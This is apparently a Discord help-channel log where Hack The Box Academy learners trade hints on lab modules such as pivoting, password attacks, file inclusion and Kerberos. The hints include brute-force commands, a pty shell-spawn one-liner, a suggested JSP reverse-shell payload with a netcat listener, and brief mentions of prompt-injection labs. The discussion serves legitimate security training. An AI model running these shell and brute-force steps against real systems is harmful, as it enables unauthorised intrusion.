https://github.com/fortra/impacket/issues/1251 here is the answer why -vss flag doesn't work
Guys, what should I have to apply to pentester??
I am doing Pro lab solar htb, i have an issue with jail escape after accessing jupiter.solarsystem.htb machine. Any help?
Best to ask in #1263635449335910531
If you have no access, read and follow #welcome
It has nothing to do with the Academy modules, but just read the job ads in your area and see what requirements need to be met.
I advise you to read and follow #welcome so that you can access better channels.
Hello, guys. Where i can find correct wordlist for this module/section?
https://academy.hackthebox.com/module/144/section/1257
I used subdomains-top1million-110000.txt but it found all subdomains except su
Hello, in the Skill Assessment of the Password Attack module I tried to set up ligolo for pivoting but i'm new to this and there is a weird behaviour I cannot say if it comes from me or not. When the session is started in ligolo I can ping DC01 in the internal network corresponding to: 172.16.119.11 but I can't ping FILE01 and JUMP01. Do you have any idea how this is possible ? Wrong set up from me ? Or it's definitely weird and I should reset the machine? (I did this yesterday and it worked totally,)
It should be in there actually, are you sure you're brute forcing correctly?
@neon tinsel I just need the command you used, not the results, as those are spoilers
oh, sorry.
gobuster vhost -u url_here -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain --threads 100
ok that's interesting, can you DM me with the full output of that command?
H
Anyone available for discussion regarding "Attacking Common Applications - Skills Assessment II"
Hi
First you need to gain foothold in dmz01, install the agent, start tunnel in ligolo and then you are able to ping jump01 and dc
After connecting do you have the route set? Do you have the ips and hostnames in your /etc/hosts file? Also not all devices may respond to pings
running an nmap -Pn scan may reveal info to ensure that the internal targets are operating properly
Windows targets, generally, dont respond to pings
hi guys
So I got the foothold on dmz01, I'm able to ping DC01, but not the others, I have not changed the /etc/hosts since i'm working with ips (Tell me if i'm wrong). I thought maybe jump01 and file01 blocked pings ? It seems nmap work fine in fact :))
do u guys have tool for the hackthebox
As i said a moment ago: not all devices may respond to pings :)
Thank you :))
Theres no one tool for hackthebox
is it only in resource links?
?
things where u can do cyber stuff
sorry kinda new to the environment
As i said, theres no one tool to rule them all. And this isnt #general
ok wait a bit
In order to gain access to chat there, youll need to link your hackthebox account to the discord server
ah oka thanks
Hi guys, I'm working on the web attack section of the web pentester path. In the bypassing basic authentication section of http verb tampering, it says we can use curl -i -X OPTIONS http://SERVER_IP:PORT/ to see which methods are allowed, but this actually does not show the options in practice as it does with the module. Is this on purpose or does my lab have some form of error ?
one last question pls
Hii i have like submitted 2-3 requests in this group but the thing is no mod or support member does even try to reply
Why we are having discord community when the mods can't even help or try to reply
Tagging you cause I only saw you reply to others having problem
after pivoting to a machine with ligolo, is there a way to get the sudo responder -I <int-name> -A working from my host? seems like i HAVE to rely on the linux attack host that they provide to use responder
Not everything you see will be replicable
The best way to get website support is by contacting support via the website, not by asking in the discord.
Ok thanks. I was just wondering how I'd check on the exam
I cant tell you that info
Not without a lot of portforwarding shenanigans
Website support take 1-2 days to solve a single error that's why I posted my queries here
Not that I want you to tell me, but if the method being thought is not working then I'm assuming they will teach other methods ?
Also you didnt say what your issue was. I get youre upset but depending on the issue not sure what can be done on this end
#modules message here it is please just nudge me
It just depends. It could be configured or it couldn't, consider everything taught to be possible on the exam and dont focus too hard on details like that
Ok thanks
Log off and log back on
Also: website support doesnt help with content problems if the issue is not technical (lab is broken/not spawning/etc)
This server is more focused on community help, not everyone has done the module you're on
Log off of the account, then log back onto the account after setting it
That's literally the solution to your problem
Closing the rdp session doesnt log you off btw
Also deleted the message because its a spoiler
Yes I got thanks but I'm just asking is it possible to bypass uac without logging off I'm trying various methods like DLL auto elevate to build my methodology
There are also some modules/section that no one will even touch again, let alone help someone with.
*ehem* thick clients *ehem*
No: because the relevant rights weren't set yet
Now I got it
You're asking for help with something thats out of scope for what's being asked of the module
Thank you @fathom pendant appreciated your help
I do hope you're doing AEN blind and not answering the questions and reading the module
As that will help strengthen and reinforce your methodology more
No I'm doing it blind and preparing pentest report so was trying various methods I learned within cpts path
I suggest first completing the attack chain [getting to the highest privilege in the domain] before going and trying different methods
Afterwards, the module basically becomes simple to read and go through and see what methods the author used instead
Getting hung up on one step before completing it is just going to be a detriment, especially in cases where you may actually be on a timed test
I'll go with this approach now
Thank you and also thanks for suggesting something useful
No problem; its easy to get in the mindset of "how can I do this differently" but its also important to complete the objective first, then return. That way you dont get the other feeling of "oh god, I spent x hours on this, im cooked"
One last request just to be confident whenever I'll complete my AEN pentest report can I dm you and send the report then you can give me feedback if possible?
No, thats actually against the rules. It was ruled so by the arbiters (staff)
In general; just stick as close to the sample report as possible and be consistent in your labeling
It used to be allowed, why they banned it is beyond me. It's such a good way to know if you're on the right track for documentation since that module was so shite
Technically; sharing content above tier 0
but the template is public for the exam anyway on sysreptor
speaking of sysreptor highly recommend also use a LOCAL INSTALL, there's been times when the site goes down and you don't want that to happen during the exam.
But still if someone can read and get me the genuine feedback would boost the confidence as I cannot just give myself the feedback you know what I'm saying it's just slightly a benefit of doubt
I forget the bts convo where it was decided you can probably look at the chat in #lounge-staff or #moderation
You can maybe message support on the website to see, but thats as far as I know
You'll get pretty detailed feedback on the report anyways after your first attempt if you do fail. Which is why I highly recommend not submitting a blank report. Even if you know you'll fail (i.e. not enough flags) at least prepare your report to the best of your ability so that you can get good feedback.
Imo one of the more important things with AEN is solving where your weak points are
I can try for second attempt but I mentally prepared myself to get it achieve within the first attempt but yes let's see how my report goes as if getting 12 flags but cannot output the desired report would also fail me
Hard truth is: you won't know until you try, yes doing AEN blind is a massive undergoing, and that alone deserves respect. But CPTS is MUCH HARDER than AEN. and unlike AEN, there is a very short time limit in respect to how long it actually is.
AND you dont have a convenient guide to cheat with
Why is that?
Because that section, or some sections, are just so hard, that even after doing them, and gaining deeper knowledge and skill in those areas, people won't be willing to provide help for it, at least not for free
Oh i understand, so you have the high tier ones in mind
Understandable
understand that module tier != module difficulty. There are some tier 4 modules I'd imagine would be quite easy
Hm i always used their set difficulty as an info source though id imagine some might be easier to handle, but im nowhere near them rn 
module tier moreso relates to the required underlying knowledge more than difficulty
tier 0 -> you don't know shit
tier 1 -> you kinda know shit
tier 2 -> ok now you know a bit of something
tier 3 -> wtf it goes deeper?
tier 4 -> now you're just fucking with us
While it's understandable that encountering issues with the cloud version during an exam is inconvenient, it's important to view this in context. Over the past 90 days, we've maintained an uptime of 99.936% (see status.sysreptor.com), which translates to only a few hours of total downtime. Today's interruption was caused by an incident at our server provider's data center. Unfortunate and naturally, it's when people notice most and complain.
That said, I don't fully agree with the suggestion to "highly recommend the local installation." Running a local setup comes with its own significant overhead: keeping everything running smoothly, handling updates, handling the database, and preparing for unexpected failures. Users must also manage backups and test recovery procedures. We've seen many cases of users losing their encryption keys because they forgot to back them up, resulting in data loss. We receive a fair number of support requests about this though you don't often see those issues here on Discord.
In the end, choosing cloud or local is a personal decision; both have pros and cons
Lmaoo thats such a great explanation
this question is driving me crazy in the windows prisec module, how do i enumerate im allowed to run as administrator...
Please dont @ me directly. Im not staff nor am I required to actually respond. Also you gave not enough info to help you
Erratum is for reporting module errors, not for asking for help
well i find it to be an error to not explain
Evil Twin Attack on WPA2
I'm completely stuck on this module. I have already recovered the handshake, but inside the module's VM there is no wordlist to crack the handshake and obtain the answer to the question: "Perform the evil twin attack as demonstrated in this section. What is the discovered value of the WPA PSK?"
Hello everyone. I am stuck with module "ATTACKING AI - APPLICATION AND SYSTEM", its about the 'Model Deployment Tampering' task. When I am trying to replicate the attack and execute the last curl cmd on the page, then I get error '{"code": 500, "type": "NullPointerException", "message": "Cannot invoke "java.util.Map.entrySet()" because "modelsInfo" is null"}'. Does anyone know how to fix it?
can someone help me in how do i get permission so i can talk in general and the other channels
Instructions are in #welcome
thank you so much
It sounds like you need to supply "modelsInfo" in your curl request, given the error
Is there any methods to root xiaomi phones without bootloader access
for this task i have to find what type of service the dconf service is. the only problem is i can't seem to find it and keep getting blank outputs. does anybody have an idea? also just searching for it using systemctl gives me no result. EDIT: found the file but it seems to have an empty type. TYPE:
i don't recall if that one specifically has a target you can ssh into
it does not give a target ip and is a module you can finish on the HTB VM itself
it helps to know the module and section name btw
my bad, it is the Task Scheduling from the linux fundamentals
you might need to dig into the systemd directories for dconf.service
Thank you, i found it. so it is not possible to find it via systemctl?
No, I think that the one running in systemctl is using a different config
okay got it. thanks a lot for the help
Hi Can you help me out the answer of the first question, i tried all the possible combination but it does not accept the hash. Have solved other task but this one is being a pain
dm me, I can help
Hello Everyone,
i was wondering if anyone could help me with "Terminate Pwnbox to switch location".
I googled and watched youtube videos, also read the help to Pwnbox, but the button mentioned there is nowhere to be found on my page.
My location is set to UK, but i need it to be DE since im from Germany.
Also, if i press "Start Instance", there is a popup in the upper right corner of my screen which says "There are no available instances. Please try later"
same problem im having
+1
+1
@swift dove thank you for recommending Google Colab, especially in trojan attacks section in AI Data Attacks, helps a lot
seems very much like an issue on the entire platform? having this for a few hours now
New here! Does anyone know how to obtain more Pwnbox instance spawns? I didn't see anywhere to "purchase" more spawns?
you can't purchase instance spawns; on academy if you've spent any amount of money you get infinite. on the main platform having more pwnbox time is directly tied to having a subscription
Ok! Thank you!
but it appears plenty of people having spawn issues with the pwnbox, could be an upstream issue with their provider
good evening everyone, about AI red teamer: LLM output attack: Function calling 3, could any one drop some hint for this? e.g., is it SQL injection or? Totally clueless for this one -3-
Howcome i cant talk in general
Hello, can anyone help me on server side attacks skills assessment?
you can dm me
How come grep prints some lines starting with random numbers (red) but when I pipe it into sort it removes the random numbers?
Linux foundations module
Last screenshot was grep with -o, heres the output for normal
Its likely something to do with terminal printing progress, try with -s
Yeah its progress printing shenanigans see the 100 22266 lines and it matches similarly to the progress output
Yess that was the issue, thank you
I just spotted the pattern
I cant use rdp with proxychains in the password attacks skills assesment, could someone help me
ligolo-ng avoids the need for proxychains; but errors tend to help more. did you try running proxychains with sudo?
@strong vector
U welcome
anyone able to help with this?
Most welcome !
Hi - I have completed the AI Red Teaming Track and am left with 9 flags overall. If someone who can help pls ping me so I can connect for any hints to complete the track
hey, im 2 days deep in the password attacks skills assessment and i dont have enough money to continue my academy subscription so i can't waste any more time, if someone could dm me to help i would be grateful ^^ (i rlly need help)
I have finished the Advanced Deserialization attack. I don't see where can I review/feedback to the module, so I think I will write it here.
I hope this module should add more content to it such as reproduce custom gadget in old CVE and sharing the road to it as the same approach in the module. As my point of view, it's not "advanced" too much as the title (the current content).
Anyway, the module provides additional idea, how to approach the issue and more deep understanding the well-known gadget. It will be helpful if you doesn't work with this kind of vuln before.
In the module: Command Injections, section: Advanced Command Obfuscation, subsection: Reversed Commands there is a tip given:
Tip: If you wanted to bypass a character filter with the above method, you'd have to reverse them as well, or include them when reversing the original command.
I want to know how would this work against the character semi-colon ( ; ). Thanks!
hola
hey can I DM you for the SA, I'm stuck here and I need a nudge
Okay sure, you can dm me
hello guys, i am doing web proxies module in that zap scanner and i got stuck like how we can get the flag like i got 1 dir called devtools there is ping.php
can someone help me in this please
I cant recall but I'd probably go straight to check for command injection
ok brother
got it
thanks man
Modules: Password Attacks
Section: Network Services
Link: https://academy.hackthebox.com/module/147/section/1327
Hi guys, I am stucked on the rdp part for few hours, where i tried bruteforcing with the username.list and password.list given, with -t 4, but it still not working, i did found some credentials but those are for winrm only, can someone provide some tips on that?
u can bruteforce smb first, and then use cracked credentials directly to rdp
New HTB Academy design sucks and its too heavy on my old laptop.
That is my feedback
eiii, i cant do it jn
i think cuz i put /u: and /p: with space
ahhhhhhhh
thank you!
perhaps u need xfreerdp3 instead of xfreerdp, I also cant use it
Can anyone DM me?
for what?
yeah
Advanced SQL Injection module - The error for failed compilejava for fernflower. To fix this update to JDK 21 install rather than 17 mentioned in the module.
is there a good stable reverse shell that isnt meterpreter? i still want to use multi/handler but entirely remove my usages of meterpreter
when you exports ticket with rubeus, how do you guys decode the base64
I tried using online decoders and also linux cli but it outputs gibberish
Hello, is introduction to Python3 enough to write my own tools ?
echo -n '<base64 here>' | base64 -d > <ticket name.kirbi>
Well, a tool is a broad description, but for simple automation yes.
Should you expect to write something like netexec? probably not
Would it be enough to continue on CWEE path
Do you already have CWES?
general suggestion
as green is the "dopamine" button to pass next stage, I think submit should be green and show solution blue as I always accidentally click on show solution instead of submitting to continue
I'm learning it ATM but I was wondering if python3 is enough for CWEE after CWES ofc
I'm not too sure but I'm assuming it's just a bit of automation needed for CWEE.
It's not meant to be data you can read.
Should my knowledge in Python be beyond that module?
oh
Whatever's included in the path is all you need for said path. If it's all that's in CWEE for automation, then it's all you need
Okay thanks
You'd have to first convert it into a ccache file then you can check it using MIT KRB
I was hoping to get the ticket descriptions sort of how it is with mimikatz
As I said, you can convert it into a ccache file then check it using MIT KRB tools on linux.
Use: impacket-ticketConverter.py to convert the ticket and klist to check the ticket description
Read more in the article
There's also probably a way to pass it straight onto mimikatz but I prefer using remote tools on linux
Welp, a little google searching shows you can get the info straight from Rubeus
I'm having a little issue with an academy module.
In the Intro to Network Traffic Analysis, Networking Primer - Layers 5-7 I've answered all of the questions and I can't interact with the answers, but it won't let me mark it as complete. I've tried other browsers and incognito mode
Have you tried a full refresh? Ctrl+shift+R
CTRL+F5, no luck unfortunately
i need a help on NEW -module-Web Fuzzing-Validating Findings , after fuzzing target system using directory-list-2.3-medium.txt i find few directories i am afraid if im going on the right track .
Contact support
thank you
can someone help me with Attacking Thick Client Applications, Im not understanding how to complete this section of the Attacking Common Applications module
hahahaha
but you have to solve byyourself at the end
The proxy server is refusing connections. (non-VPN machine) Anyone else experiencing the same?
Check your web proxy, and maybe start burp or whatever web proxy you use
nice, forgot to turn it off yesterday bruh
@waxen totem may I DM you regarding a module? Thanks.
You don't have to ask about a module in DMs
In the module: Command Injections, section: Advanced Command Obfuscation, subsection: Reversed Commands there is a tip given:
Tip: If you wanted to bypass a character filter with the above method, you'd have to reverse them as well, or include them when reversing the original command.
I want to know how would this work against the character semi-colon ( ; ). Thanks!
ngl no clue, the most command obfuscation I ever needed was to use base64 encoding 
I put links as answer and for some reason it isnt correct
Funny since you mentioned that, the question section in the same section also only solves by that technique. The other techniques don't work, however they tell us to use one of the techniques learned in the section.
Try all the techniques, whichever sticks, sticks
so anyone gonna help me with my question, cuz for some reason "links" isnt correct
even tho thats the correct answer
which module and section is this from?
introduction to networking
from network foundations
Hello everyone!
I'm stuck on a question from the "Introduction to Command Line" module in the "Managing Services" section, and I have used the two possible answers so far.
The question is: What command string will stop a service named 'red-light'? (full command as the answer).
I answered sc stop 'red-light' and it's marked as incorrect. Then I tried the command Stop-Service -Name 'red-light' and it's also being marked as incorrect.
I need your guidance.
Hi everyone, the File Transfer module is more indicated for exploitation phase or post-exploitation phase?
nvm Ill watch a youtube video
Looks like that's the correct answer, maybe check for leading/trailing spaces and try different capitalization forms
?
I'd say post-exploitation, because you usually only ever transfer files if you already have a foothold
In the penetration tester path this module appears after the Vulnerability Assessment
They never said that the modules were in the order of the process 
they have called it "path"
Active Directory Enumeration and Attacks is before Web Attacks but more likely than not you'll have access to Web first if it's a fully external test
because they put it in the order they think is best to learn, not in the order in which it's actually done.
got it
Guys
And I also tried with net stop and nothing
Remove the single quotes from your first answer and then try.
Thanks a lot.
In cmd, you should use double quotes " instead of single quotes when your service name (or any argument) contains special characters or spaces. Single quotes ' don't work the same way they do in Linux shells like Bash.
However, if you're in PowerShell, both quotes work fine.
Hi new here
You need credentials for that one
Oh, I have the creds, but I just can't seem to be able to actually use the exploit within msfconsole
Ohh ... Actually you can't "use" the module itself. My bad
You need to reload_all in msfconsole - to reload all modules
Or as an alternative, you can specify the folder (I believe it's saved somewhere on the box itself - or maybe you have it in your kali) with -m /home/FolderPath and then search with the filename
Ahh, okay sweet. Thanks!
module is above tier 0 also don't share info about skill assessments @scenic arrow
Apologies! Will know for next time.
Try OneShot
You still need help with this one?
I finished today, you still need help ?
Hey guys, trying myself with module getting started n having some troubles with Public Exploits, mb someone could help me with understanding of finding services?
You're over thinking it, youre given a public ip and a port. That is the only port you need to concern yourself with
okay, ty
Anyone up for a quick question on ai evasion - foundation?
Hi, stuck at bopla / mass assignment one in api attacks, I can create order but I get error when creating items, and really can't figure what's wrong here?.
Make sure you're populating the right OrderID and ProductID, the OrderID is the ID of the order that you created (obviously) and the ProductID has to correspond to the correct product in /api/v1/products
I think you're on the wrong server. Please read #rules.
Hi guys. I'm currently doing the malicious document analysis and i'm currently at the analysis of XLL Add-ins. After 6 hrs i somehow managed to get the bin file but when i try to run speakeasy i keep getting the "invalid instructions" error. I've tried speakeasy with different options but i still get the same error. Can somebody help pls?
If anyone is free I could use a nudge on Attacking Common Services SMTP, I've been trying to get q2 for a few hours, and with a lot of experimentation, I still don't have the creds for the found user.
Adjust the wait time
that did it thanks!
@drifting hazel thats illegal, and we dont do that here
Has anyone completed the "Jailbreaks II" module in "Prompt Injection Attacks" module? I have tried everything in the module, read the papers it references and tried a few things from there as well. Any help would be appreciated.
Module name: Attacking common services. When we enumerate users on SMTP or POP3 with the USER command or VRFY, does a returned name like john refer to an email address for that domain or OS level account?
It refers to name registered in the email, such as john@domain
SMTP/POP3/IMAP are all mail protocols, so i wouldn't make broad assumption that its an OS level account when the account could just be somewhere in the system
Its hard to make sweeping generalizations as well
Okay, so it refers to an email account for that domain. I was confused because in the module they brute force the POP3 service using just john instead of john@domain.com
That could be how its set up on that service, and the @domain could be appended on the backend portion instead of being required on the front
Can anyone help me out a bit, right now I am on my penetration tester path but In the module of pivoting and tunneling, I am sending one dll file for socks over rdp but it's getting deleted by AV even the thing is mentioned in the module course, but machine is deleting it, and I am not able to solve the challenge.
As i said in #cpts, its real-time protection thats running - gotta disable that first
Google should be your first stop if you're gonna ask how
not that dumb, but thanks!!
thank you!
But tell me one thing, are we allowed to turn it off during our exams?
Do what is required to get what you need done. You will be given a scope that tells you what you can't do
Cool, Thanks!!
Hey I am having problems with this question in network foundation, I am pretty sure the answer is p2p but it doesnt seem to work in any way
What type of architecture allows nodes to act as both client and server?
https://academy.hackthebox.com/module/289/section/3242
There was another person in the past having problems with another question in this same module, I am slowly losing my mind on this
it's not asking for the shorthand it's asking for the full word-for-word
Nevermind, I got it, but I am not sure it was the intended way...
Just for funsies, along with the flag, I got the lab to write a poem about HackTheBox Academy with "flowery" language:
In a field of beauty, where petals sway,
A rare bloom of knowledge, in a special way.
HackTheBox Academy, a place to explore,
Where flowers of wisdom, forever bloom more.
With every petal, a lesson is learned,
And in its center, a hacker is yearned.
A flower of knowledge, that's what it is,
HackTheBox Academy, a place to grow and rise."
I must've mistyped it and dismissed that, it worked now, thanks
Not sure if this is the best place to ask, but I have the student plan on HTB academy, does the VIP plan on HTB Labs add an extra $18 a month or does it include the student plan
Pretty sure it's extra. But not positive...
makes sense
Hello, I have a quick question about Wappalyzer.
In the HTB module screenshots, Wappalyzer shows the Web Server and Programming Language, but on my VM, it only detects the CDN and jQuery for the same target.
I also noticed nmap shows the ports as filtered. Is this filtered status the reason why Wappalyzer isn't showing the backend tech details?
Academy and Labs are two different platforms, two different subscriptions.
thanks
Just daily reminder you don't have to be working on academy like a regular high school day your brain retains information if you were to work for an hour and then take a break for about 30-50 mins maybe total work time a day 3-4 hours give your mind more time to think on it
@everyone I hope someone is up and available to help me with an issue i am having. about answering a question in the "Linux Fundamentals"
Yeah, guess I was sleepy yesterday. Started again today and realized we could see the products. Thanks mate
Hello can y'all hack servers
anything i did wrong? enabled ssh and everything. And I tried connecting with the http server but it refuses to connect back to me.
You have a typo, look carefully at the end of your command
Thank you so much
Hi everyone, I'm taking the SQL Fundamentals Skills Assessment in CWES. I found the hash for the admin, but when I submit it as answer, I get that the answer is not correct. I even looked at the solution, and it seems the correct hash. I checked the spaces before and after it and also removed the first part of the hash. Could someone help me with this? I am afk for now and will look later. thanks already!
how u got that hash, any hints . I tried all the payloads but failed
@junior halo yes, start with || ')|| and then follow the course material to get table data etc.
Domain Compromised in AEN!
Is there more than one route from DMZ that I can get my way to Domain admin?
Cuz I heard that cpts exam is more linear
Thanks. I just switched to a different computer and everything worked)
Hey, i have to extract KRBTGT Account's NT Hash using mimikatz, but i can't :/ why ?.
In this section :
https://academy.hackthebox.com/module/143/section/1457
I'm logging to htb-student_adm
I am also facing the same issues, have completed other question. Seems like the module issue
what is best module i can buy in CAPE path for 500 cubes (other than kerberos attacks)?
Hey, if any staff are around you might wanna take a look at the Dynamic Port Forwarding with SSH and SOCKS Tunneling module, the second host seems to be down
Same on my local machine, same on the pwnbox
can't access it from the pivot host
iirc you should be using the lab_adm user, not htb-student_adm user iirc they don't have the same rights/privs
either that or you need to run powershell as admin
Hey guys. Is it just me or someone also have a similar problem. I have been working on the password attack module and under Pass the Certificate section all the IP addresses that i am being provided are not working.
The error message is always the host is down and unreachable.
I have done some parts but now not working at all.
Its either you get a connection for a few minutes and drops or one host will be up and the other one down.
How can i fix this?
reach out to website support; i'd also check to make sure you don't have multiple vpn connections running
also don't cross-post to multiple channels
I am Stuck on the module Skills Assessment - SQL Injection Fundamentals
the First question "What is the password hash for the user 'admin'? Have obtained the hash but that is not working."
Rest of the question including the last flag is completed but this gives me error, can someone please guide me on this
Hello can anyone Help me with file inclusion
Skills Assessment - File Inclusion I can't bypass this
if (isset($_GET["region"])) {
    if (str_contains($_GET["region"], ".") || str_contains($_GET["region"], "/")) {
        echo "'region' parameter contains invalid character(s)";
    }
}
Can nudge you with the following:- there are 2 vulnerable endpoints where one does file read and one does execution
Dm check
thanks for the help let me keep digging
Hi, I have a question for the Brute-Forcing Password module in the Broken Authentication course.
Towards the end of the module, it says, "Upon providing an incorrect username, the login response contains the message (substring) "Invalid username", therefore, we can use this information to build our ffuf command to brute-force the user's password:"
I double-checked the error message I get on the deployed machine and for an invalid username as well valid username but invalid password, the message is the same: "Invalid username or password". Thus, when I built my ffuf command with this message, I get nothing
I tried the steps as mentioned in the module and though I got the password, I am curious as to this discrepancy. Am I not understanding it correctly ?
can any one assist me how to install adb?
cause I try to install it by sudo but I couldn't
i solved it copy the whole thing
so sudo apt install adb doesn't work? it helps to know errors of some form that may be helpful in diagnosing the issue
You might need to run sudo apt update, then sudo apt install adb
@boreal raven what is whole thing including p= or even more?
It should match either. You can DM your input and output if you are not getting the desired results.
hey in the attacking common services easy skill assessment trying to brute force the rdp and ftp with the user and pass lists in the resources gave nothing any help with that ?
Which tool you using?
hi ,,
anyone can help me since im stuck on this module almost 1 month.
I need help with module Window Privilege Escalation , the question is " What service is listening on port 8080 (service name not the executable)? "
.\PingCastle.exe -h
The program is unsupported since: 2025-07-31 00:00:00Z)
nxc
anyone................
Try hydra or Medusa they may work
Which sub topic?
Did you see if that service is open using netstat -ano command?
with the user and pass list in the resources ?
Its skill assessment so you should not rely on it but you can try if it works or even finds you valid user
i tried run inside the RDP and yes it show port 8080, but I dont see the service name..
check this out
It won't let you see the service name try to look around on program files or x86 to see installed applications?
ok ..
Whenever you see some ports open specially 80,443 or 8080 your first instinct should be to look for installed services
use tasklist to find it
https://stackoverflow.com/questions/48198/how-do-i-find-out-which-process-is-listening-on-a-tcp-or-udp-port-on-windows this is an interesting SO
this is also a case where you should be able to use built-in tooling to find it not just exploring what's installed. (you also don't know if there's multiple 'installed' services, but not running)
Hi who do I contact about a billing issue. I emailed customerops. They replied asking for more info and seem to have gone into a blackhole, no longer responding to emails.
open ticket, you will get faster reply
Can someone help me with Blacklist filter in File upload module - I have tried different extension and some of them says "upload successful" and tried using GET request but I get php code a output
@hexed lintel thanks
Module: API Attacks
Section: Broken Authentication
Question: Exploit another Broken Authentication vulnerability to gain unauthorized access to the customer with the email 'MasonJenkins@ymail.com'. Retrieve their payment options data and submit the flag.
Problem What I am supposed to do with the Password Reset & OTP Endpoints here?
Look at the request body parameters for each endpoint to determine what you are supposed to do with them.
hey in the attacking common services easy skill assessment trying to brute force the rdp and ftp with the user and pass lists in the resources gave nothing is there anyone who solved that lab might hint me please?
If you don't have a username identified yet, try to enumerate other services.
In the new UI there is no resources button. FYI
@gray yacht can i dm you please
I am running kali-arm64 in my MacBook and i have the BloodHound CE v8.2.0 running. The BloodHound UI have no Analysis tab, and does not automatically render a graph view. Does your BloodHound CE behave the same way?
Sure
you can transfer the txt
Hey everyone, I'm working on the new file inclusion skills assessment and could use a small hint. I've successfully identified an Arbitrary File Read vulnerability, which I used to discover an Unrestricted File Upload vulnerability. I can upload a PHP shell to the /uploads/ directory and can predict its MD5-hashed filename. However, direct access to the shell is blocked by a deny all rule in the Nginx configuration, resulting in a 403 error.
I feel like I'm just one step away but am missing a small detail. Any pointers would be appreciated!
UPDATE:
Look at the contact.php source code page
python -m http.server port and in your machine wget://victimip:port, you can see this in transfer methods
or try to do python -c 'import pty; pty.spawn("/bin/sh")' to give a interactive shell in linux
Module: Attacking common services, does this mean that both entries are linked servers, but isremote = 0 means it is another database instance on the same machine?
hello guys!
i am on the passwords skill assessment
i got creds from DMZ01 and pivoted using ligolo everything is working fine but i cant rdp into the next target?
i added everything into etc/hosts but still getting an error. nmap shows the port is open and NC shows the same
Sometimes ligolo doesn't work so if you can do local port forward
try with xfreerdp3
what is the best free nmap course
This is going to be a very generic, often asked question, but i want to know. Where should i start learning if i want to become advanced in this field?
Doesn't matter if the port is open and service is running. Are you sure the user creds you've harvested can gain remote access to that host? Have you tried those creds against all hosts? What is a JUMP server generally used for?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@dawn gazelle
Oh w
need help in File inclusion assessment , got lfi but cant escalate it further , any hints
Paste the whole line you got not just the hash
AI Data Attacks + Pickles and Stenography - can i do it in Pwnbox or do i have to set up my own linux vm?
any tips on the LLM Output attack final assignment? Stuck for days
there are multiple targets; only one is able to be rdped into i suggest checking with nxc and the creds you have :)
hello I tried using your method, which involves using the password provided in the example ("pentester3"), but it neither enabled OTP via SMS nor OTP via email. I also tried brute-forcing the password.
Additionally, I attempted to brute-force the OTP while passing the correct endpoint for the password reset, but that didn't work either.
this is the question in api attacks Broken Authentication
Exploit another Broken Authentication vulnerability to gain unauthorized access to the customer with the email 'MasonJenkins@ymail.com'. Retrieve their payment options data and submit the flag.
Is there a module for Immunity Debugger setup/mona setup?
Stack-Based Buffer Overflows on Windows x86?
Hello There
I am currently working on the Module "Cracking Passwords with Hashcat" section "Cracking common hashes".
Could anyone give me some help regarding the question of cracking the following hash: 7106812752615cdfe427e01b98cd4083 ?
I am working on the password attacks module. I'm logged into HTB on a Kali VM and I tried downloading the vpn link, starting the machine, but when I try to launch the openvpn file it just stops here:
Is there a module admin I can speak to about some lab issues I experienced in the Attacking WPA3 Wi-Fi Networks module? The training does not correctly outline the TTP for OWE Evil Twins
i got access the panel , now getting confused between parameters . cant see anomaly clearly , any hints for sql fundamentals skill assessment
if you're having lab issues it's best to reach out to website support
Need some help? Learn how to reach the support team on Academy.
this is expected behavior; open a new terminal and you should be good to go
hi
https://academy.hackthebox.com/module/115/section/1139 why is this lab so slow? The Live Engagement
Working through the foothold is quite painful (it's extremely slow and keeps freezing up).
sometimes I think the paths haven't been updated .
That means you're connected. The terminal is working currently with the command 'sudo openvpn "your_file_goes_here"'
You can open another terminal or use 'sudo -b openvpn "your_file_goes_here"' instead
Hello!
I could use a hand on
Active Directory Enumeration & Attacks
Attacking Domain Trusts - Child -> Parent Trusts - from Linux
I'm supposed to get the NT hash of user "bross" but so far not going so well and I think I'm missing something. Anyone available to help?
Did you solve it?
java/jsp_shell_reverse_tcp try this one with a netcat listener, I had same issue for some reasons
In Active Directory Enumeration & Attacks > Credentialed Enumeration - from Windows ( https://academy.hackthebox.com/module/143/section/1421 ), I can't connect to the target? I copy-pasted IP, username, and password to be sure, and tried both xfreerdp and xfreerdp3 after installing that on Pwnbox...what am I missing here?
Never mind, just had to reset the target AGAIN, lol
could someone hint me on why my php code is not executing, i managed to bypass the filter and i've tried null byte char and still didnt execute
Perhaps that extension doesnt work, also null byte stuff is a pain the ass, dont use it if possible
Also; your php code isn't taking any parameters
yeah but that's just 1 attempt, i forgot to remove the query param
Need help with connecting using the vpn for the academy modules. Is this the right place to get help?
You can ask here but the website is the only official support
This is a good article https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn
All you need to know about the VPN Connection for Academy
Yup, did everything in that guide. The issue is I'm getting a no route to host despite the routes being established.
(base) ┌──(nuvious㉿kalimini)-[~/Code/HTBAcademy]
└─$ ip route
default via 192.168.11.1 dev wlan0 proto dhcp src 192.168.11.204 metric 600
10.10.8.0/22 via 10.10.14.1 dev tun0
10.10.14.0/23 dev tun0 proto kernel scope link src 10.10.14.2
10.129.0.0/16 via 10.10.14.1 dev tun0
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1 linkdown
192.168.11.0/24 dev wlan0 proto kernel scope link src 192.168.11.204 metric 600
(base) ┌──(nuvious㉿kalimini)-[~/Code/HTBAcademy]
└─$ ssh htb-student@10.129.71.56
ssh: connect to host 10.129.71.56 port 22: No route to host
This is in the linux fundamentals section. The instance is reported to be up under that specific IP, it just isn't connecting even though the route is populated.
Going to try restarting the instance, but given it's a routing issue I'm not sure that will do anything.
Bounced it again, got a different IP but same result.
can anyone help me in using web proxies Repeating Requests section?
idk which one of these are the flag
(its not flag.txt)
It should be flag.txt, check for trailing and leading spaces
Ohhh
any clue?
hold on it's been a while since I've done that module and I don't have notes for it 
can u give me the flag if u have done it
No, sharing flags is not allowed
Ok so just look around in the root (/) directory using the command injection.
Just another prod at the above. Is there a more formal support channel for more technical issues like this? Can get by using pwnbox but would prefer to use the VPN route. No worries as well if someone's looking into it and just hasn't had a chance to respond.
There's no official support on Discord
Need to speak to a person? Learn how to reach our support via HTB Labs.
Thanks!
Thanks!
PIVOTING, TUNNELING, AND PORT FORWARDING
Skills Assessment:
In previous pentests against Inlanefreight, we have seen that they have a bad habit of utilizing accounts with services in a way that exposes the users credentials and the network as a whole. What user is vulnerable?
